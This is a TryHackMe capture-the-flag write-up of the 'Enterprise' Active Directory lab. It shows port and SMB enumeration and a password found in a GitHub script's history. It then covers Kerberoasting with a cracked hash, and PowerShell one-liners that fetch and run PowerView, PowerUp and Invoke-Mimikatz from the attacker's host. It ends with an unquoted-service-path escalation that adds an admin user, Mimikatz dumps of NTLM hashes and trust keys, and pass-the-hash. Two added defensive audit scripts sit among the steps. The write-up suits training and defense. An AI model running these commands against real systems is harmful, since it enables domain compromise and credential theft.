
On penetration testing: TryHackMe Enterprise (Unquoted Service Paths)

Service discovery

Port scan

root@ip-10-10-208-107:~# nmap -p- 10.10.59.205 --open

Starting Nmap 7.60 (https://nmap.org) at 2022-03-04 02:48 GMT
Nmap scan report for ip-10-10-248-133.eu-west-1.compute.internal (10.10.59.205)
Host is up (0.0039s latency).
Not shown: 61918 closed ports, 3588 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5357/tcp  open  wsdapi
5985/tcp  open  wsman
7990/tcp  open  unknown
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49671/tcp open  unknown
49673/tcp open  unknown

Service detection

root@ip-10-10-208-107:~# nmap -sV -Pn 10.10.59.205 -p 53,80,88,135,139,389,445,464,593,636,3268,3269,3389,5357,5985,7990,9389,47001,49664-49673

Starting Nmap 7.60 (https://nmap.org) at 2022-03-04 02:57 GMT
Nmap scan report for ip-10-10-248-133.eu-west-1.compute.internal (10.10.59.205)
Host is up (0.00075s latency).

PORT      STATE  SERVICE       VERSION
53/tcp    open   domain        Microsoft DNS
80/tcp    open   http          Microsoft IIS httpd 10.0
88/tcp    open   kerberos-sec  Microsoft Windows Kerberos (server time: 2022-03-04 02:57:49Z)
135/tcp   open   msrpc         Microsoft Windows RPC
139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open   ldap          Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name)
445/tcp   open   microsoft-ds?
464/tcp   open   kpasswd5?
593/tcp   open   ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open   tcpwrapped
3268/tcp  open   ldap          Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name)
3269/tcp  open   tcpwrapped
3389/tcp  open   ms-wbt-server Microsoft Terminal Services
5357/tcp  open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5985/tcp  open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
7990/tcp  open   http          Microsoft IIS httpd 10.0
9389/tcp  open   mc-nmf        .NET Message Framing
47001/tcp open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open   msrpc         Microsoft Windows RPC
49665/tcp open   msrpc         Microsoft Windows RPC
49666/tcp open   msrpc         Microsoft Windows RPC
49667/tcp closed unknown
49668/tcp open   msrpc         Microsoft Windows RPC
49669/tcp open   msrpc         Microsoft Windows RPC
49670/tcp open   ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open   msrpc         Microsoft Windows RPC
49672/tcp closed unknown
49673/tcp open   msrpc         Microsoft Windows RPC
MAC Address: 02:CC:01:6E:8F:D9 (Unknown)
Service Info: Host: LAB-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.08 seconds

SMB

Enumerating shares

┌──(root💀kali)-[~/tryhackme/Enterprise]
└─# crackmapexec smb 10.10.59.205 -u '' -p '' --shares
SMB         10.10.59.205   445    LAB-DC           [*] Windows 10.0 Build 17763 x64 (name:LAB-DC) (domain:LAB.ENTERPRISE.THM) (signing:True) (SMBv1:False)
SMB         10.10.59.205   445    LAB-DC           [-] LAB.ENTERPRISE.THM\: STATUS_ACCESS_DENIED 
SMB         10.10.59.205   445    LAB-DC           [-] Error enumerating shares: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

Anonymous login is not allowed, but we still obtained:
the domain name: LAB.ENTERPRISE.THM
the DC's hostname: LAB-DC

Enumerating again with smbclient, this time the shares are listed:

┌──(root💀kali)-[~/tryhackme/Enterprise]
└─# smbclient --no-pass -L //10.10.59.205

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Docs            Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
        Users           Disk      Users Share. Do Not Touch!
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.59.205 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Users

This share can be accessed without credentials:

┌──(root💀kali)-[~/tryhackme/Enterprise]
└─# smbclient --no-pass //10.10.59.205/Users
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Thu Mar 11 21:11:49 2021
  ..                                 DR        0  Thu Mar 11 21:11:49 2021
  Administrator                       D        0  Thu Mar 11 16:55:48 2021
  All Users                       DHSrn        0  Sat Sep 15 03:28:48 2018
  atlbitbucket                        D        0  Thu Mar 11 17:53:06 2021
  bitbucket                           D        0  Thu Mar 11 21:11:51 2021
  Default                           DHR        0  Thu Mar 11 19:18:03 2021
  Default User                    DHSrn        0  Sat Sep 15 03:28:48 2018
  desktop.ini                       AHS      174  Sat Sep 15 03:16:48 2018
  LAB-ADMIN                           D        0  Thu Mar 11 19:28:14 2021
  Public                             DR        0  Thu Mar 11 16:27:02 2021

                15587583 blocks of size 4096. 9920786 blocks available

Put together a user list:

Administrator
atlbitbucket
bitbucket
LAB-ADMIN

Tried to check whether any of the users above have Kerberos pre-authentication disabled.

Found a user credential file:

smb: \LAB-ADMIN\AppData\Local\Microsoft\Credentials\> ls
  .                                 DSn        0  Thu Mar 11 19:28:46 2021
  ..                                DSn        0  Thu Mar 11 19:28:46 2021
  DFBE70A7E5CC19A398EBF1B96859CE5D   AHSn    11152  Thu Mar 11 18:09:04 2021

                15587583 blocks of size 4096. 9919566 blocks available

Looking this up, it is an RDP login credential, but from what I could find there is no way to crack it.

Docs

┌──(root💀kali)-[~/tryhackme/Enterprise]
└─# smbclient --no-pass //10.10.59.205/Docs
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Mar 14 22:47:35 2021
  ..                                  D        0  Sun Mar 14 22:47:35 2021
  RSA-Secured-Credentials.xlsx        A    15360  Sun Mar 14 22:46:54 2021
  RSA-Secured-Document-PII.docx       A    18432  Sun Mar 14 22:45:24 2021

There are two Office files, but they are password-protected. I converted them with office2john.py into hashes that john can recognize and ran john against them, without any result.

HTTP

Port 80 has nothing useful.

Port 7990 is also HTTP; it looks like it runs a web app called ATLASSIAN, but it is really just a static page.

The login box contains one line of text:

Reminder to all Enterprise-THM Employees:We are moving to Github!

Searching Google for "enterprise-thm github" turns up the GitHub page.

There is only one project, About-US.

The maintainer is a user called Nik-enterprise-dev. Their profile also has a PowerShell project containing a single script:

Import-Module ActiveDirectory
$userName = ''
$userPassword = ''
$psCreds = ConvertTo-SecureString $userPassword -AsPlainText -Force
$Computers = New-Object -TypeName "System.Collections.ArrayList"
$Computer = $(Get-ADComputer -Filter * | Select-Object Name)
for ($index = -1; $index -lt $Computer.count; $index++) {Invoke-Command -ComputerName $index {systeminfo} }

The username and password are both empty.

Opening the script's history page, the earliest version still has the username and password in it:

Import-Module ActiveDirectory
$userName = 'nik'
$userPassword = 'ToastyBoi!'
$psCreds = ConvertTo-SecureString $userPassword -AsPlainText -Force
$Computers = New-Object -TypeName "System.Collections.ArrayList"
$Computer = $(Get-ADComputer -Filter * | Select-Object Name)
for ($index = -1; $index -lt $Computer.count; $index++) {Invoke-Command -ComputerName $index {systeminfo} }

We now have a user credential:

nik:ToastyBoi!

Find SPNs

┌──(root💀kali)-[~/tryhackme/Enterprise]
└─# python3 /opt/impacket/examples/GetUserSPNs.py -dc-ip 10.10.59.205 lab.enterprise.thm/nik:ToastyBoi! -request -outputfile hash.txt
Impacket v0.9.24.dev1+20210814.5640.358fc7c6 - Copyright 2021 SecureAuth Corporation

ServicePrincipalName  Name       MemberOf                                                     PasswordLastSet             LastLogon                   Delegation 
--------------------  ---------  -----------------------------------------------------------  --------------------------  --------------------------  ----------
HTTP/LAB-DC           bitbucket  CN=sensitive-account,CN=Builtin,DC=LAB,DC=ENTERPRISE,DC=THM  2021-03-11 20:20:01.333272  2021-04-26 11:16:41.570158   

We get one user's SPN and the corresponding TGS hash; crack it with john:

┌──(root💀kali)-[~/tryhackme/Enterprise]
└─# cat hash.txt 
$krb5tgs$23$*bitbucket$LAB.ENTERPRISE.THM$lab.enterprise.thm/bitbucket*$d286d86f986ebc5ed08752398bfa566a$... (hash truncated)
┌──(root💀kali)-[~/tryhackme/Enterprise]
└─# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
littleredbucket  (?)     
1g 0:00:00:01 DONE (2022-03-04 00:56) 0.8620g/s 1354Kp/s 1354Kc/s 1354KC/s livelife93..liss27
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Account: bitbucket
Password: littleredbucket
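As an added defender-side example (not code from the writeup), this PowerShell audit lists the domain accounts that carry an SPN, i.e. the accounts whose service tickets can be requested and cracked offline as shown above, and flags those still permitted to use RC4 (etype 23, the type john cracked here). It assumes the ActiveDirectory RSAT module and a domain-joined session; the group name sensitive-account is taken from the GetUserSPNs output.

```powershell
# Added audit script (not from the original writeup). Assumes the ActiveDirectory
# module (RSAT) and a domain-joined session; run with a normal domain account.
Import-Module ActiveDirectory

function ConvertFrom-SupportedEncryptionTypes {
    param([AllowNull()][int]$Value)
    # Bit values of msDS-SupportedEncryptionTypes. 0 / not set means the DC falls
    # back to its default, which on most domains still allows RC4.
    if (-not $Value) { return @('DEFAULT (RC4 allowed)') }
    $names = @()
    if ($Value -band 0x1)  { $names += 'DES_CBC_CRC' }
    if ($Value -band 0x2)  { $names += 'DES_CBC_MD5' }
    if ($Value -band 0x4)  { $names += 'RC4_HMAC' }
    if ($Value -band 0x8)  { $names += 'AES128' }
    if ($Value -band 0x10) { $names += 'AES256' }
    return $names
}

function Test-Rc4Permitted {
    param([AllowNull()][int]$Value)
    return (-not $Value) -or (($Value -band 0x4) -ne 0)
}

function Find-KerberoastableAccounts {
    param([string]$Server)
    $params = @{
        # krbtgt always has an SPN; it is excluded because its TGS cannot be requested this way.
        Filter     = 'ServicePrincipalName -like "*" -and SamAccountName -ne "krbtgt"'
        Properties = 'ServicePrincipalName', 'msDS-SupportedEncryptionTypes',
                     'PasswordLastSet', 'MemberOf', 'AdminCount'
    }
    if ($Server) { $params.Server = $Server }
    Get-ADUser @params | ForEach-Object {
        $etypes = $_.'msDS-SupportedEncryptionTypes'
        [pscustomobject]@{
            SamAccountName  = $_.SamAccountName
            SPNs            = ($_.ServicePrincipalName -join ', ')
            EncryptionTypes = (ConvertFrom-SupportedEncryptionTypes $etypes) -join ','
            Rc4Permitted    = Test-Rc4Permitted $etypes
            PasswordAgeDays = if ($_.PasswordLastSet) { [int]((Get-Date) - $_.PasswordLastSet).TotalDays } else { $null }
            # Privileged if protected by AdminSDHolder or in a sensitive group (group names assumed).
            Privileged      = ($_.AdminCount -eq 1) -or [bool]($_.MemberOf -match 'CN=Domain Admins|CN=sensitive-account')
        }
    }
}

# Review the risky subset: RC4 still allowed and the account is privileged or has an old
# password. In the writeup, bitbucket (HTTP/LAB-DC, member of sensitive-account) is such a case.
Find-KerberoastableAccounts |
    Where-Object { $_.Rc4Permitted -and ($_.Privileged -or $_.PasswordAgeDays -gt 365) } |
    Format-Table -AutoSize
```

Accounts that show up here are candidates for a long random password or a group managed service account, and for setting msDS-SupportedEncryptionTypes to AES only.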

Connect to the target over RDP with the following command:

xfreerdp /f /u:bitbucket /p:littleredbucket /v:10.10.59.205 /size:1280x1030

The user flag is on the desktop.

Local privilege escalation

Start a simple HTTP server on Kali and pull the enumeration and privilege-escalation tools onto the target over HTTP:

iex (iwr http://10.11.63.196/PowerView.ps1 -UseBasicParsing)

iex (iwr http://10.11.63.196/SharpHound.ps1 -UseBasicParsing)

iex (iwr http://10.11.63.196/Invoke-Mimikatz.ps1  -UseBasicParsing)

iex (iwr http://10.11.63.196/PowerUp.ps1  -UseBasicParsing)

Enumerate all domain users:

PS C:\Users\bitbucket> get-netuser|select cn

cn
--
Administrator
Guest
atlbitbucket
krbtgt
BitBucker
nik
REPLICATION
spooks
Korone
Banana
Cake
Contractor
Varg
Joiner

Enumerate all Domain Admins:

PS C:\Users\bitbucket\Desktop> Get-NetGroupMember -GroupName "Domain Admins" -Recurse |select MemberName

MemberName
----------
joiner
Cake
korone
Administrator

Collect domain information with SharpHound:

Invoke-BloodHound -CollectionMethod All -verbose

To get files from the target back to Kali, use SMB: since we have bitbucket's credentials, drop the files into the bitbucket folder of the Users share and then download them over SMB.

Running PowerUp reveals a service with an unquoted service path:

[*] Checking for unquoted service paths...


ServiceName    : zerotieroneservice
Path           : C:\Program Files (x86)\Zero Tier\Zero Tier One\ZeroTier One.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'zerotieroneservice' -Path <HijackPath>
CanRestart     : True

ServiceName    : zerotieroneservice
Path           : C:\Program Files (x86)\Zero Tier\Zero Tier One\ZeroTier One.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'zerotieroneservice' -Path <HijackPath>
CanRestart     : True

A quick test shows that we can write files into C:\Program Files (x86)\Zero Tier\ and that we have permission to restart this service.
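The following PowerShell audit is an added example, not code from the writeup or from PowerUp. It reproduces the check PowerUp performed: for every service whose unquoted ImagePath contains spaces, it expands the intermediate executables Windows would try before reaching the real binary, flags the ones whose directory grants write rights to broad groups, and prints the sc.exe command that fixes the service by quoting its path. The ZeroTier path used in the demo call is the one from the PowerUp output above.

```powershell
# Added audit script (not from the original writeup or from PowerUp). Assumes a
# Windows host with the standard Get-CimInstance and Get-Acl cmdlets.
$BroadPrincipals = @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users')
$WriteRights = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, CreateDirectories, Write, Modify, FullControl'

function Get-UnquotedServicePathCandidates {
    param([Parameter(Mandatory)][string]$ImagePath)
    # The binary part of the command line ends at the first ".exe"; the rest is arguments.
    $m = [regex]::Match($ImagePath, '^(?<bin>.+?\.exe)', 'IgnoreCase')
    if (-not $m.Success) { return @() }
    $bin = $m.Groups['bin'].Value
    # A quoted path, or one without spaces, is parsed unambiguously: nothing to report.
    if ($bin.StartsWith('"') -or $bin -notmatch ' ') { return @() }
    $parts = $bin -split ' '
    $candidates = @()
    # CreateProcess tries each prefix ending at a space, appending ".exe":
    # C:\Program.exe, C:\Program Files.exe, C:\Program Files (x86)\Zero.exe, ...
    for ($i = 1; $i -lt $parts.Length; $i++) {
        $candidates += (($parts[0..($i - 1)] -join ' ') + '.exe')
    }
    return $candidates
}

function Test-BroadWriteAccess {
    param([Parameter(Mandatory)][string]$Directory)
    # True when an Allow ACE for a broad principal carries any write/append right.
    if (-not (Test-Path -LiteralPath $Directory)) { return $false }
    $acl = Get-Acl -LiteralPath $Directory
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band [int]$WriteRights) -ne 0) { return $true }
    }
    return $false
}

function Get-ServicePathFixCommand {
    param([Parameter(Mandatory)][string]$ServiceName, [Parameter(Mandatory)][string]$ImagePath)
    # Remediation: wrap the path in quotes. Run from an elevated cmd.exe; sc.exe
    # requires the space after "binPath=".
    return "sc.exe config $ServiceName binPath= `"\`"$ImagePath\`"`""
}

function Find-UnquotedServicePaths {
    # One row per hijackable candidate path; services run as LocalSystem are the worst case.
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $svc = $_
        if (-not $svc.PathName) { return }
        foreach ($cand in Get-UnquotedServicePathCandidates -ImagePath $svc.PathName) {
            $dir = Split-Path -Path $cand -Parent
            [pscustomobject]@{
                ServiceName = $svc.Name
                StartName   = $svc.StartName
                Candidate   = $cand
                Writable    = Test-BroadWriteAccess -Directory $dir
                Fix         = Get-ServicePathFixCommand -ServiceName $svc.Name -ImagePath $svc.PathName
            }
        }
    } | Where-Object { $_.Writable }
}

# Demo with the path from the writeup (the service need not exist on this host):
Get-UnquotedServicePathCandidates -ImagePath 'C:\Program Files (x86)\Zero Tier\Zero Tier One\ZeroTier One.exe'
# Live audit of the current host:
Find-UnquotedServicePaths | Format-Table -AutoSize
```

Besides quoting the path, check the directory ACLs themselves: the PowerUp output above shows BUILTIN\Users with AppendData/AddSubdirectory on C:\, which is a Windows default, while write access to the vendor directory under Program Files (x86) is a misconfiguration that should be removed.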

Use the Write-ServiceBinary function to write a Zero.exe:

PS C:\Program Files (x86)\Zero Tier> Write-ServiceBinary -Name 'zerotieroneservice' -Path 'C:\Program Files (x86)\Zero Tier\Zero.exe'

ServiceName        Path                                      Command
-----------        ----                                      -------
zerotieroneservice C:\Program Files (x86)\Zero Tier\Zero.exe net user john Password123! /add && timeout /t 5 && net localgroup Administrators john /add

This step mainly creates a user called john with the password Password123! and adds john to the local Administrators group.

The binary now exists in the target directory:

PS C:\Program Files (x86)\Zero Tier> ls


    Directory: C:\Program Files (x86)\Zero Tier


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        3/14/2021   6:08 PM                Zero Tier One
-a----         3/4/2022  12:58 AM              6 1.txt
-a----         3/4/2022   1:01 AM          22016 Zero.exe

Restart the service:

PS C:\Program Files (x86)\Zero Tier> sc.exe stop zerotieroneservice
[SC] ControlService FAILED 1062:

The service has not been started.

PS C:\Program Files (x86)\Zero Tier> sc.exe start zerotieroneservice

SERVICE_NAME: zerotieroneservice
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 5348
        FLAGS              :

Now open a shell on the desktop with "Run as administrator" and enter the credentials john:Password123!

This successfully opens an administrator shell:

PS C:\Windows\system32> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== ============================================
lab-enterprise\john S-1-5-21-2168718921-3906202695-65158103-1120


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ===============================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                     Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

We can see the user is now in the BUILTIN\Administrators group.

Get root.txt:

PS C:\users\Administrator\Desktop> type .\root.txt
THM{1a1fa948754212963...}

Cross-domain (not successful)

Enumerate all trust relationships:

PS C:\users\bitbucket\Desktop> Get-NetForestDomain -Verbose | Get-NetDomainTrust

SourceName         TargetName       TrustType TrustDirection
----------         ----------       --------- --------------
LAB.ENTERPRISE.THM ENTERPRISE.THM ParentChild  Bidirectional
LAB.ENTERPRISE.THM morimori.com      Kerberos       Outbound

There is a bidirectional trust with the parent domain.

Use Mimikatz to dump all NTLM hashes:

PS C:\users\Administrator\Desktop> Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` (benjamin@gentilkiwi.com)
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             (vincent.letoux@gmail.com)
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::lsa /patch
Domain : LAB-ENTERPRISE / S-1-5-21-2168718921-3906202695-65158103

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : 8537943ee84c50d9d4035c519ce2cb68

RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 43c1c941c7f0eb3a74d8864ab7dfa212

<skip>

Open a shell as Administrator:

Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:LAB.ENTERPRISE.THM /ntlm:8537943ee84c50d9d4035c519ce2cb68 /run:powershell.exe"'

Enumerate all trust relationships on the DC:

PS C:\Windows\system32> Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName LAB-DC.LAB.ENTERPRISE.THM

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` (benjamin@gentilkiwi.com)
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             (vincent.letoux@gmail.com)
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::trust /patch

Current domain: LAB.ENTERPRISE.THM (LAB-ENTERPRISE / S-1-5-21-2168718921-3906202695-65158103)

Domain: ENTERPRISE.THM (ENTERPRISE / S-1-5-21-1835041512-953509921-1126143443)
 [In] LAB.ENTERPRISE.THM -> ENTERPRISE.THM
    * 3/11/2021 4:30:39 PM - CLEAR   - b9 f4 a3 46 54 fe ad 6c 3d a6 0b 74 cd 56 49 ea 3c 2d c1 79 11 cd e0 6c ce d9 c8 6c fa 93 c8 8a b7 39 be a7 0d 25 01 6b 90 3b 0c ad 82 65 b8 ba 0c fc be 07 13 9b fd 39 89 09 8f 03 41 3e d3 4c 3f e6 ba 97 d1 37 47 7d 10 56 c6 0c ce 55 ba bf 7a 86 6d fd 90 e4 ca 8f 00 0d bc f4 8f d7 c2 23 e8 61 70 48 de a0 b1 14 2d 45 ce 67 3d 0b 2f 2d 07 fb 1e b8 84 b0 e3 e1 c7 25 64 f6 fe c5 f5 9a ba a5 bd 0d 3a 14 45 4f 01 ee 80 49 d3 14 a4 ab 76 7c 3b 59 ef a4 17 41 34 b1 c0 9d 9b 58 48 dd f9 03 7c 74 7e ed d6 6e 9a ba f3 d4 be e5 a1 fc 51 a1 a9 8e f8 d0 0b 9f f6 db a1 e9 de a7 7c 57 f2 00 3f a2 e2 35 6c 47 1d da 5f 5d 48 db 6f 61 3c 41 61 23 c7 65 ce f5 6e 78 d2 25 21 40 8c 60 9f 0e 3f 46 7c 19 63 e7 8c 58 52 db 49 21 6b a6 d1 02 ac 6f a6 81 bd 1f be 6b e1 62 94 ec 3d 7c
        * aes256_hmac       eb0a1f52c2e7f30dbcf02a1737e2527da685a36d511e6b96da5d3517ba91a73c
        * aes128_hmac       7eed741499c0611a0275bfd2d83b0de1
        * rc4_hmac_nt       d84d2d46e70ebdcd94ec6f3c79f5731f

 [Out] ENTERPRISE.THM -> LAB.ENTERPRISE.THM
    * 3/11/2021 4:30:39 PM - CLEAR   - b9 f4 a3 46 54 fe ad 6c 3d a6 0b 74 cd 56 49 ea 3c 2d c1 79 11 cd e0 6c ce d9 c8 6c fa 93 c8 8a b7 39 be a7 0d 25 01 6b 90 3b 0c ad 82 65 b8 ba 0c fc be 07 13 9b fd 39 89 09 8f 03 41 3e d3 4c 3f e6 ba 97 d1 37 47 7d 10 56 c6 0c ce 55 ba bf 7a 86 6d fd 90 e4 ca 8f 00 0d bc f4 8f d7 c2 23 e8 61 70 48 de a0 b1 14 2d 45 ce 67 3d 0b 2f 2d 07 fb 1e b8 84 b0 e3 e1 c7 25 64 f6 fe c5 f5 9a ba a5 bd 0d 3a 14 45 4f 01 ee 80 49 d3 14 a4 ab 76 7c 3b 59 ef a4 17 41 34 b1 c0 9d 9b 58 48 dd f9 03 7c 74 7e ed d6 6e 9a ba f3 d4 be e5 a1 fc 51 a1 a9 8e f8 d0 0b 9f f6 db a1 e9 de a7 7c 57 f2 00 3f a2 e2 35 6c 47 1d da 5f 5d 48 db 6f 61 3c 41 61 23 c7 65 ce f5 6e 78 d2 25 21 40 8c 60 9f 0e 3f 46 7c 19 63 e7 8c 58 52 db 49 21 6b a6 d1 02 ac 6f a6 81 bd 1f be 6b e1 62 94 ec 3d 7c
        * aes256_hmac       643128314165f87c41041f07c13490fc0d96189f45c2eb3efcaa956707dd5a5e
        * aes128_hmac       3872b51d2e6716a863060cf1c00e4980
        * rc4_hmac_nt       d84d2d46e70ebdcd94ec6f3c79f5731f

 [In-1] LAB.ENTERPRISE.THM -> ENTERPRISE.THM
    * 3/11/2021 4:30:39 PM - CLEAR   - b9 f4 a3 46 54 fe ad 6c 3d a6 0b 74 cd 56 49 ea 3c 2d c1 79 11 cd e0 6c ce d9 c8 6c fa 93 c8 8a b7 39 be a7 0d 25 01 6b 90 3b 0c ad 82 65 b8 ba 0c fc be 07 13 9b fd 39 89 09 8f 03 41 3e d3 4c 3f e6 ba 97 d1 37 47 7d 10 56 c6 0c ce 55 ba bf 7a 86 6d fd 90 e4 ca 8f 00 0d bc f4 8f d7 c2 23 e8 61 70 48 de a0 b1 14 2d 45 ce 67 3d 0b 2f 2d 07 fb 1e b8 84 b0 e3 e1 c7 25 64 f6 fe c5 f5 9a ba a5 bd 0d 3a 14 45 4f 01 ee 80 49 d3 14 a4 ab 76 7c 3b 59 ef a4 17 41 34 b1 c0 9d 9b 58 48 dd f9 03 7c 74 7e ed d6 6e 9a ba f3 d4 be e5 a1 fc 51 a1 a9 8e f8 d0 0b 9f f6 db a1 e9 de a7 7c 57 f2 00 3f a2 e2 35 6c 47 1d da 5f 5d 48 db 6f 61 3c 41 61 23 c7 65 ce f5 6e 78 d2 25 21 40 8c 60 9f 0e 3f 46 7c 19 63 e7 8c 58 52 db 49 21 6b a6 d1 02 ac 6f a6 81 bd 1f be 6b e1 62 94 ec 3d 7c
        * aes256_hmac       eb0a1f52c2e7f30dbcf02a1737e2527da685a36d511e6b96da5d3517ba91a73c
        * aes128_hmac       7eed741499c0611a0275bfd2d83b0de1
        * rc4_hmac_nt       d84d2d46e70ebdcd94ec6f3c79f5731f

 [Out-1] ENTERPRISE.THM -> LAB.ENTERPRISE.THM
    * 3/11/2021 4:30:39 PM - CLEAR   - b9 f4 a3 46 54 fe ad 6c 3d a6 0b 74 cd 56 49 ea 3c 2d c1 79 11 cd e0 6c ce d9 c8 6c fa 93 c8 8a b7 39 be a7 0d 25 01 6b 90 3b 0c ad 82 65 b8 ba 0c fc be 07 13 9b fd 39 89 09 8f 03 41 3e d3 4c 3f e6 ba 97 d1 37 47 7d 10 56 c6 0c ce 55 ba bf 7a 86 6d fd 90 e4 ca 8f 00 0d bc f4 8f d7 c2 23 e8 61 70 48 de a0 b1 14 2d 45 ce 67 3d 0b 2f 2d 07 fb 1e b8 84 b0 e3 e1 c7 25 64 f6 fe c5 f5 9a ba a5 bd 0d 3a 14 45 4f 01 ee 80 49 d3 14 a4 ab 76 7c 3b 59 ef a4 17 41 34 b1 c0 9d 9b 58 48 dd f9 03 7c 74 7e ed d6 6e 9a ba f3 d4 be e5 a1 fc 51 a1 a9 8e f8 d0 0b 9f f6 db a1 e9 de a7 7c 57 f2 00 3f a2 e2 35 6c 47 1d da 5f 5d 48 db 6f 61 3c 41 61 23 c7 65 ce f5 6e 78 d2 25 21 40 8c 60 9f 0e 3f 46 7c 19 63 e7 8c 58 52 db 49 21 6b a6 d1 02 ac 6f a6 81 bd 1f be 6b e1 62 94 ec 3d 7c
        * aes256_hmac       643128314165f87c41041f07c13490fc0d96189f45c2eb3efcaa956707dd5a5e
        * aes128_hmac       3872b51d2e6716a863060cf1c00e4980
        * rc4_hmac_nt       d84d2d46e70ebdcd94ec6f3c79f5731f


Domain: MORIMORI.COM (morimori.comERROR kull_m_string_displaySID ; ConvertSidToStringSid (0x00000057)
)
 [In] LAB.ENTERPRISE.THM -> MORIMORI.COM

 [Out] MORIMORI.COM -> LAB.ENTERPRISE.THM
    * 3/11/2021 7:30:30 PM - CLEAR   - 50 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00
        * aes256_hmac       a80d035b0775088e8ec1836d43f8b32f4cafca1f31f7c46f1615651dd140f382
        * aes128_hmac       10aac1e975ebdd4edb90692ebb2db502
        * rc4_hmac_nt       a4f49c406510bdcab6824ee7c30fd852

